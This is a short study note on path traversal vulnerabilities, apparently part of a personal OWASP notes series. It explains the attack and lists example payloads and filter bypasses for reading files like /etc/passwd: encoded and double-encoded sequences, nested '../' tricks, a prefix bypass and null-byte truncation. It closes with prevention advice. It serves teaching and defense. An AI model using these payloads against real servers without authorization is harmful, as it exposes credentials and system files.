· 3 min read Sam Verified author

Path Traversal attacks

Path Traversal notes

Path Traversal Vulnerability OWASP

Category: [Server-Side]
Severity: [Medium to Critical]
Impact: [Information Disclosure, File Read/Write, RCE]


1. Concept

Path traversal also known as Directory Traversal, enables an attacker to read arbitrary files on the server that is running an application, example:

  • Application code & data
  • Back-end credentials
  • Sensitive operating system files (e.g. /etc/passwd) In some cases it can enable the attacker to write files and change application’s behavior and take full control over server.

2. Reading arbitrary files

example, a shopping website which is using ?filename=something to load images of products:

<img src="/loadimage?filename=1.png"

usually document root is /var/www/images, so site load /var/www/images/1.png, in this case attacker can change the path in URL with a path traversal sequence and read what he wants:

https://example.com/loadimage?filename=../../../etc/passwd

This causes website to read from the following path:

/var/www/images/../../../etc/passwd → /etc/passwd

This will show a UNIX sensitive file’s content to attacker. The scenario can happen on windows too:

https://example.com/loadimage?filename=..\..\..\windows\win.ini

3. Common obstacles to exploiting path traversal vulnerabilities

Many websites that place user inputs into file paths implements defenses against this attack which can be bypassed.

Some Bypasses:

filename=../../../etc/passwd → If this blocked
filename=/etc/passwd         → Then refer directly to the file

If website removes path traversal sequence, for example ../, then:

../../../etc/passwd → Blocked
....//....//....//etc/passwd → (Site removes ../../..) → ../../../etc/passwd → Pass

In some contexts such as URL path or the filename parameter of a multipart/form-data request, web server may strip and remove any path traversal sequence, in this websites web server needs to URL-Decode the path, so URL-Encoding the sequence can be a good idea:

../../../etc/passwd → Blocked
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd → Pass
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd → Pass
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd → Pass

%252e%: %2e

%252f%: %2f

%c0%af: non-standard encoding of /

%ef%bc%8f: / → may also works

Application may require the user-supplied input to be started with the expected base folder or prefix, such as /var/www/images, in this case:

../../../etc/passwd → Blocked
/etc/passwd → Blocked
/var/www/images/../../../etc/passwd → Pass

Or sometimes it require user input to end with an expected format like .png:

../../../etc/passwd → Blocked
../../../etc/passwd%00.png → Pass

%00 (Null Byte) truncates the file name.


4. Preventing

  • Avoid passing user inputs into the file name related fields.
  • Compare user input with a whitelist of permitted values
  • After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory.

← Return to OWASP Notes